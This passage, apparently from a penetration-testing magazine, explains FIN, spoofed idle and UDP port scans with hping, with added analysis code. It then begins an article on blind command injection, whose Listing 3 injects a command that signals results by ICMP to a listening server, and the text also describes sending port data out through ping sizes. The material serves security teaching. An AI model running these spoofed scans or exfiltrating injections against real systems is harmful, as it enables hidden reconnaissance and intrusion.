len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=10 flags=RA seq=10 win=0 rtt=0.1 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=11 flags=RA seq=11 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=12 flags=RA seq=12 win=0 rtt=0.4 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=13 flags=RA seq=13 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=14 flags=RA seq=14 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=15 flags=RA seq=15 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=16 flags=RA seq=16 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=17 flags=RA seq=17 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=18 flags=RA seq=18 win=0 rtt=0.5 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=19 flags=RA seq=19 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=20 flags=RA seq=20 win=0 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=21 flags=RA seq=21 win=0 rtt=0.2 ms
                                                  // Hey, port 22 is gone!
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=23 flags=RA seq=23 win=0 rtt=0.5 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=24 flags=RA seq=24 win=0 rtt=0.3 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=25 flags=RA seq=25 win=0 rtt=0.2 ms

--- 127.0.0.1 hping statistic ---
26 packets tramitted, 25 packets received, 4% packet loss
round-trip min/avg/max = 0.1/0.3/0.5 ms
root@fscking:~#
FIN Scan
A FIN scan sends a packet with only the FIN flag set. In a normal connection FIN means the end of the connection: the sender has no more data, the other side acknowledges it and the connection is torn down gracefully, which is different from a RST, which aborts the connection on the spot without any such exchange. For an unsolicited FIN, RFC 793 says a closed port must answer with a RST while an open port must silently drop the packet and not respond. This type of scan is used to get past simple stateless firewalls that only filter SYN packets. One of the tricks about it is that open ports do not respond, since they have to read the packet silently and not answer it; in which case, if the FIN packets are dropped by a firewall, all the ports will look open! Using nmap we get the same results as the other scans: Listing 11. We cannot discern what is going on here, since everything is done for us by the program, so we use hping to see the results of sending the packets to the server: Listing 12.

As you can see from the comment, port 22 is not printed: that packet is "lost", which means port 22 is open, since the host drops the FIN silently after processing it.

This type of scan is pretty much like the SYN scan, so this part is short; just remember that in a FIN scan open ports do not respond. Warning: Windows does not respond as the RFC requires (what a surprise!) and replies with RA on every port, so the scanner reports all the ports as closed.
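The reading of hping output done by eye in the SYN and FIN sections above, automated as an added example (not code from the article or from hping): parse the reply lines, map SA and RA to open and closed, and for a FIN scan treat a probe that got no reply at all as open|filtered, since the silence of an open port and the silence of a firewall dropping the probe are indistinguishable. The sample output is constructed from Listings 10 and 12; the assumption that probe number n went to port base_port + n holds for hping's -p ++ option as used in those listings.

```python
"""Turn hping reply lines like those in Listings 7 to 12 into port states,
the interpretation hping leaves to the reader. Added example, not code
from the article or from hping; the sample output below is constructed
from Listings 10 and 12.

SYN scan: flags=SA means open, flags=RA means closed.
FIN scan: flags=RA means closed; a probe with no reply at all is
open|filtered, since an open port must drop the FIN silently but a
firewall dropping the probe looks exactly the same."""

import re
from typing import Dict, List, Set

# key=value fields of a reply line, e.g. sport=22 flags=SA seq=22 win=32767
_FIELD = re.compile(r"(\w+)=(\S+)")


def parse_reply(line: str) -> Dict[str, str]:
    """Fields of one hping reply line; {} for banner, comment and summary lines."""
    if not line.startswith("len="):
        return {}
    return dict(_FIELD.findall(line))


def classify(output: str, probes_sent: int, fin_scan: bool = False,
             base_port: int = 0) -> Dict[int, str]:
    """Map probed ports to open / closed / open|filtered.

    With -p ++ hping bumps the destination port after every packet and
    numbers the probes seq=0,1,2,..., so probe n went to base_port + n
    and the reply's sport is that same port. probes_sent is the count
    from the "packets tramitted" summary line (hping's own spelling)."""
    states: Dict[int, str] = {}
    answered: Set[int] = set()
    for line in output.splitlines():
        f = parse_reply(line)
        if not f:
            continue
        port = int(f["sport"])
        answered.add(int(f["seq"]))
        flags = f["flags"]
        if "R" in flags:
            states[port] = "closed"            # RST: nothing is listening
        elif "S" in flags and "A" in flags:
            states[port] = "open"              # SYN/ACK: something is listening
        else:
            states[port] = "unexpected:" + flags
    if fin_scan:
        for seq in range(probes_sent):         # silence is the signal here
            if seq not in answered:
                states[base_port + seq] = "open|filtered"
    return states


def open_ports(states: Dict[int, str]) -> List[int]:
    return sorted(p for p, s in states.items() if s.startswith("open"))


# constructed from Listing 10 (SYN scan piped through grep SA, plus one
# closed port kept for contrast) and Listing 12 (FIN scan, port 22 silent)
SYN_SAMPLE = """\
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=22 flags=SA seq=22 win=32767 rtt=0.2 ms
len=40 ip=127.0.0.1 ttl=64 DF id=0 sport=23 flags=RA seq=23 win=0 rtt=0.2 ms
len=44 ip=127.0.0.1 ttl=64 DF id=0 sport=111 flags=SA seq=111 win=32767 rtt=0.1 ms

--- 127.0.0.1 hping statistic ---
810 packets tramitted, 810 packets received, 0% packet loss
"""

FIN_SAMPLE = "\n".join(
    f"len=40 ip=127.0.0.1 ttl=64 DF id=0 sport={p} flags=RA seq={p} win=0 rtt=0.2 ms"
    for p in range(26) if p != 22
) + "\n--- 127.0.0.1 hping statistic ---\n26 packets tramitted, 25 packets received, 4% packet loss\n"


if __name__ == "__main__":
    print("SYN scan open:", open_ports(classify(SYN_SAMPLE, 810)))
    print("FIN scan open|filtered:", open_ports(classify(FIN_SAMPLE, 26, fin_scan=True)))
```

To use it on a live run, capture hping's output to a file (hping -S -p ++ host -i u1000 > out.txt 2>&1) and pass the file contents and the transmitted count to classify(); in FIN mode every gap in the seq numbers is a port worth a follow-up SYN or connect probe.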
Bounce Scanning
By now all the IDS in your network should be screaming "hacker" all over the place, with your IP showing in every log; remember I said these are not really stealth scans. Now on to the stealth part of scanning.

Listing 13. hping sending SYN/ACK packets to a host and printing the IP id relative to the previous reply

root@fscking:~# hping -S -A -r -n 192.168.132.1 -p 100
HPING 192.168.132.1 (eth1 192.168.132.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.132.1 ttl=128 id=16133 sport=100 flags=R seq=0 win=0 rtt=17.0 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=1 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=2 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=3 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=100 flags=R seq=4 win=0 rtt=0.3 ms

--- 192.168.132.1 hping statistic ---
5 packets tramitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.3/3.6/17.0 ms
root@fscking:~#

Listing 14. hping pulling the RST id from the Windows host

root@fscking:~# hping -S -A -r -p 130 192.168.132.1
HPING 192.168.132.1 (eth1 192.168.132.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.132.1 ttl=128 id=20058 sport=130 flags=R seq=0 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=1 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=2 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=3 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=4 win=0 rtt=0.3 ms
(and the count just keeps going, but for the sake of brevity I will not put everything here)

Listing 15. hping sending SYN packets with a fake source address to the victim

root@fscking:~# hping -S -a 192.168.132.1 -p 80 192.168.132.2 -i u1000
HPING 192.168.132.2 (eth1 192.168.132.2): S set, 40 headers + 0 data bytes
(the program seems to hang here; look at the other terminal)
Some years ago a way to bounce a scan through Windows machines and routers was published; this is the technique nmap calls an idle scan. It works because the Windows TCP/IP stack (and many routers) fills in the IP identification (id) field of every packet sequentially, so such a host can be used as a third party: we read the id of the RST packets that host sends us and forge packets from that host to the victim. By watching the id increment on the Windows/router host, the real IP address of the attacker stays hidden from the victim.

On Windows the id increments by 1 per packet sent while the host is not being pushed with traffic, meaning the stack increments sequentially and not randomly like other operating systems, giving us the opportunity to spoof the connection and get some nice results. So when you send a packet and get a RST back, the id increments sequentially: Listing 13.

Using the -r option we can see that the increment on the id is +2, meaning the first one was 16133 and each following line shows that packet's id minus the id before it (16135 - 16133 = 2). The idle increment does not have to be exactly 1; what matters is that it is constant, and a constant increment gives us the opportunity of spoofing the connection.

Now imagine a network like this: Figure 1.

Figure 1. Steps taken for a bounce scan

If you start pulling the RST id from the spoofed machine, you can see that it increments by the same amount each time. Now the attacker sends a spoofed SYN packet which looks like it is coming from the spoofed machine to the victim. As soon as the victim responds with the appropriate SYN/ACK, the spoofed machine RSTs it. Why? Because it did not initiate the connection, so it is not in its table; it resets the connection, and of course that RST carries an id. The next time we send a SYN/ACK to pull the RST id from the spoofed machine, the increment is not going to be 1 but 2 (one more than the idle increment), since it already sent another RST to the victim, telling us that the port we spoofed to is open.

You cannot RST a RST packet, so if the port is closed the spoofed machine gets a RST from the victim, drops it silently and does not increment the id. This way, if we pull the RST id constantly while sending spoofed packets to the victim, we can tell which ports are open.

The firewall and the IDS on the victim are going to think the scan is coming from the spoofed machine; there goes your very expensive IDS, giving the attacker the appearance of coming from different hosts at the same time, and of course if the tool is networked right it will look like normal traffic or virus traffic. For this type of scan you need 2 shells, if possible next to each other or at least visible at the same time. On the first one we are going to start pulling the RST id from a Windows machine: Listing 14.

Warning Note: you do not need that port to be open, since you want the RST and not a SYN/ACK. That should make it really hard to find: a non-firewalled Windows machine on the Internet with low traffic, something hard to find, huh?

When you are ready, the next command will send a lot of packets to the victim machine, spoofing them as coming from the Windows machine (you don't get any output from this command): Listing 15. If the port is open you will notice an increment on the id; in my case port 80 is not open, so nothing happens (the victim answers with a RST; Listing 16). Try to guess in which line I typed the command and started to send spoofed packets to port 22 with the next command: Listing 17. As you can see, the RST id increment jumped to +102 and stayed there. As soon as I hit Ctrl-C to stop sending packets, the id went back down to +2 again.

This tells me that the port is open, and the logs on the victim point at the Windows machine. Very nice and easy to do, although it is really hard work to do it one port at a time, right? A bounce scan tool can be downloaded from http://www.security-dojo.com/code/bscan.c.
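The "try to guess in which line I typed the command" reading of Listing 16, automated as an added example (not the article's bscan.c): rebuild absolute IP ids from hping's relative (+N) output, measure the idle increment, find the replies during which the zombie was busy answering the victim's SYN/ACKs, and classify a port from the median jump so one stray packet does not decide. The id values are constructed from the +N values printed in Listing 16; the noise margin of 4 packets is an assumption chosen for that listing's traffic level.

```python
"""Read the zombie's IP id stream the way the text reads Listings 13 to 17,
deciding whether a victim port is open from the size of the id jumps.
Added example, not the article's bscan.c; the id values are constructed
from the relative (+N) values printed in Listing 16.

Model: the zombie answers each of our SYN/ACK probes with a RST whose id
is the previous one plus a constant (the idle increment, +2 in the
listings). While we spoof SYNs to the victim with the zombie's address,
every SYN/ACK the victim sends back to the zombie costs the zombie one
more RST, so the id jumps by more than the idle increment between two of
our probes; a closed victim port answers with a RST, which the zombie
ignores, so the id keeps its idle rhythm."""

from typing import List, Tuple


def deltas(ids: List[int]) -> List[int]:
    """What hping prints with -r: each id relative to the previous reply."""
    return [b - a for a, b in zip(ids, ids[1:])]


def baseline_increment(idle_ids: List[int]) -> int:
    """Idle per-probe increment: the most common delta, so one stray packet
    from the zombie does not skew it."""
    d = deltas(idle_ids)
    return max(set(d), key=d.count)


def burst(ids: List[int], base: int, noise: int = 4) -> List[int]:
    """Reply numbers (hping's seq) whose id jump exceeds base + noise:
    the lines in which the zombie was busy answering the victim."""
    return [i + 1 for i, d in enumerate(deltas(ids)) if d - base > noise]


def port_state(idle_ids: List[int], during_ids: List[int], noise: int = 4) -> Tuple[str, int]:
    """Classify the victim port from ids sampled while idle and while we
    were spoofing. Uses the median jump so a single outlier (the zombie
    talking to someone else) does not decide. Returns (state, extra)."""
    base = baseline_increment(idle_ids)
    d = deltas(during_ids)
    if not d:
        return "unknown", 0
    extra = sorted(d)[len(d) // 2] - base
    return ("open" if extra > noise else "closed"), extra


def ids_from_deltas(first: int, relative: List[int]) -> List[int]:
    """Rebuild absolute ids from hping -r output (first absolute, rest +N)."""
    ids = [first]
    for d in relative:
        ids.append(ids[-1] + d)
    return ids


# Listing 16: seq 0 has id=21078, then +2 while port 80 (closed) was being
# spoofed, +102 once the spoofed SYNs went to port 22 (open), +2 after Ctrl-C
LISTING16_RELATIVE = [2] * 11 + [3, 3, 2, 6, 123, 102, 102, 102, 102, 102, 59, 2, 2, 2]
LISTING16_IDS = ids_from_deltas(21078, LISTING16_RELATIVE)


if __name__ == "__main__":
    base = baseline_increment(LISTING16_IDS[:12])
    print("idle increment: +%d" % base)
    print("replies during the burst:", burst(LISTING16_IDS, base))
    print("port 22:", port_state(LISTING16_IDS[:12], LISTING16_IDS[16:23]))
    print("port 80:", port_state(LISTING16_IDS[:12], LISTING16_IDS[:6]))
```

The burst in Listing 16 lands on replies 16 to 22, and the median jump during it is 100 above the idle +2, so port 22 is reported open while the first stretch (port 80 being spoofed) stays at the idle rhythm and is reported closed. On a real zombie, sample the idle increment for a while first: if it is not constant, the host is too busy to be used.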
Listing 16. hping pulling the RST id from the Windows host while first port 80 and then port 22 of the victim are spoofed

root@fscking:~# hping -S -A -r -p 130 192.168.132.1
HPING 192.168.132.1 (eth1 192.168.132.1): SA set, 40 headers + 0 data bytes
len=46 ip=192.168.132.1 ttl=128 id=21078 sport=130 flags=R seq=0 win=0 rtt=0.5 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=1 win=0 rtt=0.5 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=2 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=3 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=4 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=5 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=6 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=7 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=8 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=9 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=10 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=11 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+3 sport=130 flags=R seq=12 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+3 sport=130 flags=R seq=13 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=14 win=0 rtt=0.4 ms
len=46 ip=192.168.132.1 ttl=128 id=+6 sport=130 flags=R seq=15 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+123 sport=130 flags=R seq=16 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=17 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=18 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=19 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=20 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+102 sport=130 flags=R seq=21 win=0 rtt=0.2 ms
len=46 ip=192.168.132.1 ttl=128 id=+59 sport=130 flags=R seq=22 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=23 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=24 win=0 rtt=0.3 ms
len=46 ip=192.168.132.1 ttl=128 id=+2 sport=130 flags=R seq=25 win=0 rtt=0.3 ms

--- 192.168.132.1 hping statistic ---
26 packets tramitted, 26 packets received, 0% packet loss
round-trip min/avg/max = 0.2/0.3/0.5 ms
root@fscking:~#

Listing 17. hping sending SYN packets with a fake source address to port 22 of the victim

root@fscking:~# hping -S -a 192.168.132.1 -p 22 192.168.132.2 -i u1000
HPING 192.168.132.2 (eth1 192.168.132.2): S set, 40 headers + 0 data bytes

--- 192.168.132.2 hping statistic ---
619 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@fscking:~#

UDP Scan
Some services run over the User Datagram Protocol, since they do not need a connection (mountd, nfsd and others, for instance). These services have their own ports assigned, and since it is another protocol the port numbers can be the same as TCP ones, but the service is not! A widely used service over UDP is the name server, which runs on port 53 UDP (and TCP); resolving requests go over UDP by default.

How do we know a UDP port is open? Because by RFC an open port does not have to respond at all, while a closed port should send back an ICMP Port Unreachable, so we can write our own scanner based on that. Let's see an example using hping (Listing 18). Port 53 (domain) is closed on the machine, so it returns ICMP Port Unreachable since the service is not there; port 111 (sunrpc) is open, so it returns nothing. Remember UDP is a connectionless protocol, so every packet is assumed to carry data meant for the service, and a service that does not understand our empty packet simply ignores it. You can use a canned tool such as nmap and the results would look like this: Listing 19. As you can see the results are the same. Keep in mind that silence is ambiguous: a firewall dropping the probe looks exactly like an open port, which is why later nmap versions report such ports as open|filtered. You could use hping to scan the entire range using the -p ++ option, or even use our own UDP scanner.
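The UDP scanner the text says we could write, as an added example (not the article's code): send an empty datagram, treat ICMP Port Unreachable as closed, treat silence as open|filtered, and call a port open only when the service actually answers. It relies on a Linux behaviour, assumed here: a UDP socket that has been connect()ed to the target has the ICMP error delivered to it as ECONNREFUSED on its next recv(), so no raw socket or root is needed. demo_localhost() is a constructed setup on 127.0.0.1 so the example runs offline.

```python
"""UDP port probe using the rule from the text: a closed port answers with
ICMP Port Unreachable, an open one usually answers nothing. Added
example, not the article's UDP scanner. Assumes Linux, where a connected
UDP socket reports a received ICMP Port Unreachable as ECONNREFUSED on
the next recv(); the localhost setup in demo_localhost() is constructed."""

import socket
from typing import Dict, Tuple


def udp_probe(host: str, port: int, timeout: float = 1.0, payload: bytes = b"") -> str:
    """closed        -> ICMP type 3 code 3 came back for our datagram
       open          -> the service answered the datagram
       open|filtered -> silence: a service ignoring an empty datagram and
                        a firewall dropping the probe look the same"""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.connect((host, port))   # records the peer only; UDP sends nothing here
        try:
            sock.send(payload)
            sock.recv(512)
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "open|filtered"


def udp_scan(host: str, start: int, end: int, timeout: float = 1.0) -> Dict[int, str]:
    """Probe start..end inclusive, what hping does with --udp -p ++."""
    return {p: udp_probe(host, p, timeout) for p in range(start, end + 1)}


def demo_localhost() -> Tuple[str, str]:
    """Bind one UDP socket that never answers (looks open|filtered) and
    release another so nothing listens there (closed); return both states."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind(("127.0.0.1", 0))
    open_port = listener.getsockname()[1]

    tmp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    tmp.bind(("127.0.0.1", 0))
    closed_port = tmp.getsockname()[1]
    tmp.close()

    result = (udp_probe("127.0.0.1", open_port, timeout=0.5),
              udp_probe("127.0.0.1", closed_port, timeout=0.5))
    listener.close()
    return result


if __name__ == "__main__":
    print(demo_localhost())
    for port, state in udp_scan("127.0.0.1", 50, 55, timeout=0.3).items():
        print(f"{port}/udp\t{state}")
```

Against remote hosts remember that many stacks rate-limit ICMP errors (Linux defaults to about one per second per destination), so a fast sweep will see silence for closed ports too and report far more open|filtered than there really are; slow down, or send a protocol-specific payload (a DNS query to 53, an RPC call to 111) to turn open|filtered into a definite open.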
Conclusion
A good scan is as good as half of the penetration of the machine; having reliable information is basic for analyzing the host without underestimating or overestimating it.

This article covers a lot of code and not a lot of writing (which was fun for me); there is not a lot new to say about scanning. Having knowledge of what happens behind network scanners such as nmap helps a lot. If you don't understand why you get a RST when you send a SYN/ACK instead of a SYN, or feel your TCP/IP theory is lacking, I recommend reading TCP/IP Illustrated volumes I, II and III by W. Richard Stevens; they are the best books on the subject. Scanning is highly underrated. It is the first step in gathering information about the network on a hands-on basis: it reports open ports, operating systems, filtered ports, whether there are any firewalls, how they are built and what their policies are, etc.

ENRIQUE SANCHEZ
Enrique Sanchez is a member of the Accuvant LABS Enterprise Attack and Penetration Testing team. Enrique has over 14 years of experience in computer security, working with industries including pharmaceutical, healthcare, banking, government, gaming and others. Enrique writes for various blogs such as question-defense.com and security-dojo.com. His main interests range from reverse engineering, exploit creation, artificial intelligence, neural networks and robotics to music, horses, video games and writing various technical papers.
Listing 18. hping sending UDP packets to port 53 and port 111

root@fscking:~# hping --udp -n 192.168.132.2 -p 53        // we are sending UDP to port 53
HPING 192.168.132.2 (eth1 192.168.132.2): udp mode set, 28 headers + 0 data bytes
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2
ICMP Port Unreachable from ip=192.168.132.2

--- 192.168.132.2 hping statistic ---
5 packets tramitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@fscking:~# hping --udp -n 192.168.132.2 -p 111
HPING 192.168.132.2 (eth1 192.168.132.2): udp mode set, 28 headers + 0 data bytes

--- 192.168.132.2 hping statistic ---
8 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@fscking:~#

Listing 19. nmap doing a UDP scan

root@fscking:~# nmap -sU -n 192.168.132.2
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.132.2):
(The 1467 ports scanned but not shown below are in state: closed)
Port       State       Service
111/udp    open        sunrpc

Nmap run completed -- 1 IP address (1 host up) scanned in 3 seconds
Audit Firewalls, Switches & Routers and produce expert level reports
Device Support Nipper Studio can audit over 100 different network device types. This includes a range of devices from the major manufacturers such as Cisco, Juniper & Checkpoint as well as many, many more. We are adding support for new devices all the time.
Quick to Implement Unlike server based systems which require installation and higher maintenance overheads, Nipper Studio can be downloaded from our website and installed in minutes.
Licensing Nipper Studio is licensed per device. Licenses can be managed centrally or split between multiple auditors, clients or sites.
Continuous Monitoring Nipper Studio can be scripted to integrate into a continuous monitoring system, or used for point in time auditing. For fast integration with other tools our graphical interface shares the same library as our command line version. This means the settings can be quickly applied before scripting the tool for conditional or time based audits.
Nipper Studio - Your Expert in a Box Nipper Studio produces expert level audit reports on your network device configurations. You can quickly and easily monitor your network security in the intervals between manual tests. Nipper Studio produces a report that: 1. Summarizes the security of your network devices e.g. firewalls, switches and routers 2. Produces a detailed report which highlights the vulnerabilities in your configurations 3. Rates these vulnerabilities by severity of threat and ease of resolution 4. Provides an easy to action mitigation plan based on your customized settings with potential resolutions including command line fixes to resolve the issue 5. Offers an audit change tracking function, enabling you to include a change comparison within your security audit, so you can easily view the progress of your network security
Versatile Reporting Networks are becoming ever more complex and you need a tool that will evolve with your needs. Nipper Studio has been built from a real world perspective to be as flexible as possible. Reports include management overviews, uniform views of disparate device configurations, full security audit and compliance reports. You can also: 1. Choose to run only the configuration audit, just the security audit or the full report 2. Export sections of the report so you can distribute it to the appropriate people 3. Choose from a huge range of configuration options e.g. hiding passwords within the report, applying classification information to the document and customizing your reports throughout
ROI- Saving Time & Money Nipper Studio produces Penetration Test level device reports in seconds and helps maintain expert level security analysis, reduce the risk of breaches & lower the cost of external audits. A Nipper Studio starter pack costs only $1000 and scalable global licensing is also available. All packages offer a great return on investment.
Contact us...
[email protected] T: +44 (0) 1905 888785 www.titania.com County House · St Mary’s Street · Worcester WR1 1HB · UK
As used by
N-OVE-0313-US
POTENTIAL ATTACKS & DEFENSE METHODS

Blind Command Line Injection

Blind Command Line injection (BCLIi) is when a web application allows operating system commands to be executed through it with no confirmation of execution. BCLIi is typically found on poorly coded applications that allow access to files or data through a web interface. If these hosts are Internet facing, the injected code could result in the compromise of the De-Militarized Zone (DMZ) and eventually the internal network. Identification of a location that could potentially yield BCLIi is difficult.

This is due to the lack of execution confirmation and the limited intelligence of where the server side code accesses a local resource. Locations that may have BCLIi usually have access to system resources or commands through either GET or POST requests. The first step is to determine if the base operating system is Linux, UNIX or Windows. There are many ways to do this, and those methods will not be covered here. The next step is to determine if the potential Command Line injection (CLIi) is present or not; and if it is present, whether it is Blind. Appending a semicolon to the location of the command with an "ls" command in Linux or "dir" command in Windows will provide one of three results. Result one (1), the page will display the results of the data within the actual web session, proving that the system is vulnerable to CLIi and it is not Blind injection. Result two (2), the web server will not respond to the screen but may have processed the command. Result three (3), the command was properly ignored or discarded.

This example will use Internet Control Message Protocol (ICMP) echo packets to return the results of injected commands. Many organizations block ICMP from external sources, but often allow ICMP echo requests that originate inside the internal network. This example requires a few things: the target host must be Linux, ICMP echo requests have to be authorized to leave the network and netcat has to be installed on the system. There are ways around each one of these conditions if they cannot be met, but they are not shown below. Lastly, all injected commands must be Uniform Resource Locator (URL) encoded to prevent illegal characters from being dropped.

So as a Penetration Tester you have found a potential injection point, but no results for each tested command are received. There are two possible solutions to grab a return confirmation: one is to use ICMP echo packets of different byte sizes to return positive and negative acknowledgements to those commands. The other solution is to change the pattern returned in the ICMP echo request with the "-p" argument. This example utilizes the differential byte size attack because some Intrusion Detection Systems or Intrusion Prevention Systems (IDS/IPS) configurations may flag an ICMP echo request with pattern changes. Tcpdump is utilized to catch results sent to the listening server. In the code examples following, the code execution location will be denoted by either "attacker@pentest:~#" or "victim@pentest:~$". The "attacker" identifies the listening server while the "victim" denotes the BCLIi vulnerable web application. Listing 1 shows how to set up tcpdump on the attacker's machine to catch ICMP echo packets.

Listing 2 shows the injectable ping command, which will modify the default data packet size from fifty-six (56) to fifty-seven (57) bytes and be sent to the listening server. This will ping the listening system with a packet that has a data size of fifty-seven (57) bytes and a header of eight (8) bytes. The total size of the packet will come out at sixty-five (65) bytes and confirm two (2) things: if this is received, then it is confirmed that ICMP echo requests can be sent and that BCLIi is possible. Figure 1 shows the injected ping into the target web server. Figure 2 shows a packet with a 65 byte length that was received, which confirmed the presence of a BCLIi.

Now that the blind command injection has been confirmed, the tester has to determine if a utility is already present to create a back door. Next, the Penetration Tester has to determine if netcat is present on the target system. A "which" command finds out if netcat is installed and returns a true or false. The return of a true result causes a one (1) byte larger ping to be sent, while a false result returns a standard ping to be sent to the listening server. Listing 3 and Figure 3 show the command and the injection of the command that determines if netcat is installed on the target system. Figure 4 shows the increased packet size of sixty-five (65) bytes, which represents a true positive, or the installation of netcat.

The next injected command will list the listening ports the target server has "open" behind the Internet facing firewall. All too often, a firewall has been configured to allow egress traffic out of ports that an internal device may listen on. An example of this would be the authorization of web servers to browse the Internet over port eighty (80). To verify which ports are open, a number of ICMP echo request packets will be sent with the byte size padded with a number of bytes equal to the port number. As an example, a listening port of eighty (80) will return a packet of one hundred and forty-four (144) bytes. This comes from the default packet size of fifty-six (56) bytes plus an eight (8) byte header, and eighty (80) bytes of padding. As a safety precaution, to prevent "Ping of Death" alerts from being triggered, all combinations that come to 65527 bytes in size or more will be dropped. This precaution only eliminates a few ports that are ephemeral or random in nature and should not have listening services attached to them anyway. To capture this traffic, tcpdump has to be restarted with the extra argument and option to dump the data to a packet capture (pcap) output file, as shown by Listing 4. The netstat command, as shown in Listing 5, will be injected into the target server to pull the unique listening port numbers and send them to the listening server by ICMP echo.

Figure 1. Injection of Modified Ping Command
Figure 2. Confirmed BCLIi Through a Differentiation of ICMP Echo Request Packet Length
Figure 3. The Command Injected To Determine the Presence of netcat
Figure 4. The Port Forwarder netcat is Installed
Listing 1. Capture ICMP Echo Requests with tcpdump
sudo tcpdump 'icmp[icmptype]=icmp-echo' -vvv -s 0 -X -i any

Listing 2. Command to Send an ICMP Echo Request of a Slightly Larger Size
ping -c 1 -s 57 <listening_server_ip>

Listing 3. This Command Determines If netcat is Installed on the Target System
which nc | grep "/nc" ; if [ $? -eq 0 ] ; then ping -c 1 -s 57 <listening_server_ip> ; else ping -c 1 -s 56 <listening_server_ip> ; fi
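The flaw the article is testing for is a handler that builds a shell command string out of a request parameter. The following is an added example, not code from the article: the injectable pattern beside its hardened form (argument-list execution, an allowlisted filename, and confinement to a document root), plus the request-side check a defender would run over access logs or in a WAF rule. The function names, the sandbox directory and the sample file are assumptions made for the example.

```python
# Added example (not from the article): the code defect behind a blind command
# injection, beside its hardened form and a request-side detection check.
# Function names, the sandbox directory and the sample file are assumptions.
import re
import subprocess
import tempfile
from pathlib import Path

# Constructed document root so the example runs offline.
DOC_ROOT = Path(tempfile.mkdtemp(prefix="bclii_demo_"))


def setup_demo_files() -> Path:
    """Create one sample file in the constructed document root."""
    sample = DOC_ROOT / "notes.txt"
    sample.write_text("quarterly notes\n")
    return sample


def vulnerable_view(filename: str) -> str:
    """'Before': the request parameter is spliced into a shell command string.
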